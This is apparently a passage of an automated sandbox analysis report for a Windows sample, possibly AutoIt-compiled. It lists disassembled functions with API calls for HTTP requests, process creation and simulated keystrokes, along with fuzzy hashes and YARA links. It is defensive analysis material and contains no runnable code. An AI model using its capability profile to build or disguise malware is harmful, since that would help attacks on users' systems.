                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004CFAA6
                                                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 004CFB45
                                                                                                                      • UnregisterHotKey.USER32(?), ref: 004CFC9C
                                                                                                                      • DestroyWindow.USER32(?), ref: 005045D6
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0050463B
                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00504668
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                      • String ID: close all
                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                      • Opcode ID: 3f614f97ce0e0ebae4f7fb21aa069aa39a2f3243b320d8218c9ab4478ee9bfef
                                                                                                                      • Instruction ID: 7f59e8706e499378556ef8873a9ab5b8f95a83f3407a7c7ebf45ac64c920e69e
                                                                                                                      • Opcode Fuzzy Hash: 3f614f97ce0e0ebae4f7fb21aa069aa39a2f3243b320d8218c9ab4478ee9bfef
                                                                                                                      • Instruction Fuzzy Hash: 2DA18C743012128FCB68EF15C594F6DFB65BF05704F1042AEE90AAB2A1DB39AC5ACF54
                                                                                                                      Function 00539113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$_memset
                                                                                                                      • String ID: ,,U$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                      • API String ID: 2862541840-1719318110
                                                                                                                      • Opcode ID: daf4c5d73bb19af010222c05ec1b58d95496af774fd9f71154b4ea9ac6c6511e
                                                                                                                      • Instruction ID: 5549f3dd5c55d09955d61c50f6f323d2351f513c2e77ebe9edd0258e41a06fef
                                                                                                                      • Opcode Fuzzy Hash: daf4c5d73bb19af010222c05ec1b58d95496af774fd9f71154b4ea9ac6c6511e
                                                                                                                      • Instruction Fuzzy Hash: 1A9190B1A00219ABDF24DFA5C848FAFBBB8FF45714F108559F915AB280D7B09944CFA0
                                                                                                                      Function 0051A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnumChildWindows.USER32(?,0051A439), ref: 0051A377
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ChildEnumWindows
                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                      • API String ID: 3555792229-1603158881
                                                                                                                      • Opcode ID: d9e466b0033a62007ed18fca2e37bae63ae1c09686f184730d383ad627546d58
                                                                                                                      • Instruction ID: 967b4dc5e6de9c0fcfa5b68fea9383f5a73184919ed3aefcb79d506b2ecb1466
                                                                                                                      • Opcode Fuzzy Hash: d9e466b0033a62007ed18fca2e37bae63ae1c09686f184730d383ad627546d58
                                                                                                                      • Instruction Fuzzy Hash: 6991E734601609ABEB09DFA1C441BEDFFB4BF04304F54852ED869A3241DF346AD9DB95
                                                                                                                      Function 004C2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 004C2EAE
                                                                                                                        • Part of subcall function 004C1DB3: GetClientRect.USER32(?,?), ref: 004C1DDC
                                                                                                                        • Part of subcall function 004C1DB3: GetWindowRect.USER32(?,?), ref: 004C1E1D
                                                                                                                        • Part of subcall function 004C1DB3: ScreenToClient.USER32(?,?), ref: 004C1E45
                                                                                                                      • GetDC.USER32 ref: 004FCD32
                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004FCD45
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004FCD53
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004FCD68
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 004FCD70
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 004FCDFB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                                      • Opcode ID: e81d1b59b16711c59c082e13d1f2e21ea4c2bdd68b74006648321e04f05f8b32
                                                                                                                      • Instruction ID: 84f48fa2aedaadb36f400569eff97c141f80717d6c1c64c0e486f87024eafd7b
                                                                                                                      • Opcode Fuzzy Hash: e81d1b59b16711c59c082e13d1f2e21ea4c2bdd68b74006648321e04f05f8b32
                                                                                                                      • Instruction Fuzzy Hash: BA71DD3440020DDFCF258F64CA84AFB3BB5FF49324F14426BEE55AA2A6D7788841DB65
                                                                                                                      Function 00531A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00531A50
                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00531A7C
                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00531ABE
                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00531AD3
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00531AE0
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00531B10
                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00531B57
                                                                                                                        • Part of subcall function 00532483: GetLastError.KERNEL32(?,?,00531817,00000000,00000000,00000001), ref: 00532498
                                                                                                                        • Part of subcall function 00532483: SetEvent.KERNEL32(?,?,00531817,00000000,00000000,00000001), ref: 005324AD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2603140658-3916222277
                                                                                                                      • Opcode ID: 8ca8e05013ad8cc693e2f418d484de30fc91108575406156dce4360752a41585
                                                                                                                      • Instruction ID: 9c4d970f14f5f9cad98e60f5f23027740ff8e0e14415819a94769a0854e0bb38
                                                                                                                      • Opcode Fuzzy Hash: 8ca8e05013ad8cc693e2f418d484de30fc91108575406156dce4360752a41585
                                                                                                                      • Instruction Fuzzy Hash: 7241AFB5501609BFEB128F64CC99FFBBBACFF09354F00412AF9059A141EB749E449BA4
                                                                                                                      Function 00538C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0054F910), ref: 00538D28
                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0054F910), ref: 00538D5C
                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00538ED6
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00538F00
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 560350794-0
                                                                                                                      • Opcode ID: 93a425b524cce8502400f5daba861cf31c735f78c6858d7df15b014770196124
                                                                                                                      • Instruction ID: d2556839872f0656be825e7301b3bcd2ebb3f6672a4087e399b5e94c718d0645
                                                                                                                      • Opcode Fuzzy Hash: 93a425b524cce8502400f5daba861cf31c735f78c6858d7df15b014770196124
                                                                                                                      • Instruction Fuzzy Hash: 2AF12875A00209EFDF08DF94C888EAEBBB9FF45314F108498F915AB251DB71AE45DB90
                                                                                                                      Function 0053F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0053F6B5
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0053F848
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0053F86C
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0053F8AC
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0053F8CE
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0053FA4A
                                                                                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0053FA7C
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0053FAAB
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0053FB22
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4090791747-0
                                                                                                                      • Opcode ID: 0873230621427b06ca1586921233a77af4278df72b3c1ce1490379dc92a3a53f
                                                                                                                      • Instruction ID: a6cbb07689b743e241c76eaeeac891137cfe527a27bf5408e6b35c508c1a2cb9
                                                                                                                      • Opcode Fuzzy Hash: 0873230621427b06ca1586921233a77af4278df72b3c1ce1490379dc92a3a53f
                                                                                                                      • Instruction Fuzzy Hash: FDE1E435604341AFDB14EF25C895B6ABBE1FF85318F14886EF8958B2A1CB34EC45CB52
                                                                                                                      Function 00524CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0052466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00523697,?), ref: 0052468B
                                                                                                                        • Part of subcall function 0052466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00523697,?), ref: 005246A4
                                                                                                                        • Part of subcall function 00524A31: GetFileAttributesW.KERNEL32(?,0052370B), ref: 00524A32
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00524D40
                                                                                                                      • _wcscmp.LIBCMT ref: 00524D5A
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00524D75
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 793581249-0
                                                                                                                      • Opcode ID: 5c5e7a18ab3e69a86c74ec87e3a014c0905121a7ba07943bd6cec3edbe875507
                                                                                                                      • Instruction ID: 2dead03a00c2a2fe926e0188ee34719b33c323e174dc1f4d642dae1c73ad8550
                                                                                                                      • Opcode Fuzzy Hash: 5c5e7a18ab3e69a86c74ec87e3a014c0905121a7ba07943bd6cec3edbe875507
                                                                                                                      • Instruction Fuzzy Hash: 685161B20083959BC724DB61D881DDF77ECAF85345F40092FB289C3191EF74A188CB6A
                                                                                                                      Function 00548645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 005486FF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InvalidateRect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 634782764-0
                                                                                                                      • Opcode ID: 4c72c48b6d6043e182f0700e75621dc6e0bbe0cdd3fda6bb6190307ab139e730
                                                                                                                      • Instruction ID: e54a01dc1deedaa589f8eba70a5daf518c20de37f0181cb991c81df9691521f4
                                                                                                                      • Opcode Fuzzy Hash: 4c72c48b6d6043e182f0700e75621dc6e0bbe0cdd3fda6bb6190307ab139e730
                                                                                                                      • Instruction Fuzzy Hash: 1551AF34500204BEEB609B288C89FFD7FA4FB1576CF604516F915E62A1DFB2A980EB40
                                                                                                                      Function 004C2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 004FC2F7
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004FC319
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004FC331
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 004FC34F
                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 004FC370
                                                                                                                      • DestroyIcon.USER32(00000000), ref: 004FC37F
                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 004FC39C
                                                                                                                      • DestroyIcon.USER32(?), ref: 004FC3AB
                                                                                                                        • Part of subcall function 0054A4AF: DeleteObject.GDI32(00000000), ref: 0054A4E8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2819616528-0
                                                                                                                      • Opcode ID: 402b1b7d667c03fc6e9aadd062f208ffb62f94a555159985b50c0d4c46688f3d
                                                                                                                      • Instruction ID: 9a84f5de48ac95ce5840baab5530f4996b1a3279922641270fd4513080ec9d23
                                                                                                                      • Opcode Fuzzy Hash: 402b1b7d667c03fc6e9aadd062f208ffb62f94a555159985b50c0d4c46688f3d
                                                                                                                      • Instruction Fuzzy Hash: 30518C78A00209AFDB24DF24CD85FAB3BB5FB54354F10452EF902A7290EBB4AD51EB54
                                                                                                                      Function 0051966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0051A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0051A84C
                                                                                                                        • Part of subcall function 0051A82C: GetCurrentThreadId.KERNEL32 ref: 0051A853
                                                                                                                        • Part of subcall function 0051A82C: AttachThreadInput.USER32(00000000,?,00519683,?,00000001), ref: 0051A85A
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0051968E
                                                                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005196AB
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 005196AE
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 005196B7
                                                                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 005196D5
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 005196D8
                                                                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 005196E1
                                                                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 005196F8
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 005196FB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2014098862-0
                                                                                                                      • Opcode ID: f4d3b5e0e231b75d93338a011f21a1345299a99f52bdc2c5991a2a6736f6b2f4
                                                                                                                      • Instruction ID: c92de8733d9e94ba493f6162161f2c448e0d740163f33275fd168210a508fcdf
                                                                                                                      • Opcode Fuzzy Hash: f4d3b5e0e231b75d93338a011f21a1345299a99f52bdc2c5991a2a6736f6b2f4
                                                                                                                      • Instruction Fuzzy Hash: EF11E1B5910218BFF6106F64DC89FAA3F6DEB4D754F111425F244AB0A0C9F26C50EBA4
                                                                                                                      Function 00518921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0051853C,00000B00,?,?), ref: 0051892A
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,0051853C,00000B00,?,?), ref: 00518931
                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0051853C,00000B00,?,?), ref: 00518946
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0051853C,00000B00,?,?), ref: 0051894E
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,0051853C,00000B00,?,?), ref: 00518951
                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0051853C,00000B00,?,?), ref: 00518961
                                                                                                                      • GetCurrentProcess.KERNEL32(0051853C,00000000,?,0051853C,00000B00,?,?), ref: 00518969
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,0051853C,00000B00,?,?), ref: 0051896C
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00518992,00000000,00000000,00000000), ref: 00518986
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1957940570-0
                                                                                                                      • Opcode ID: c69e54f5c35103dd3f0b4aebffb4a7c38ce512c1c38857ba2aeba192811a946d
                                                                                                                      • Instruction ID: 9e983b6363f4ef70c666c4dc351099fe39d28bc8a3f857a85c0c9997ffcc3947
                                                                                                                      • Opcode Fuzzy Hash: c69e54f5c35103dd3f0b4aebffb4a7c38ce512c1c38857ba2aeba192811a946d
                                                                                                                      • Instruction Fuzzy Hash: 9E01BF79640304FFE710ABA9DC4DFA73BACEB99715F405421FA05DB191CA709804DB20
                                                                                                                      Function 00539B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                      • API String ID: 0-572801152
                                                                                                                      • Opcode ID: 93da68b19f1f06f540b556daca975cd1d40fc4979edd2a54b9d69163be862315
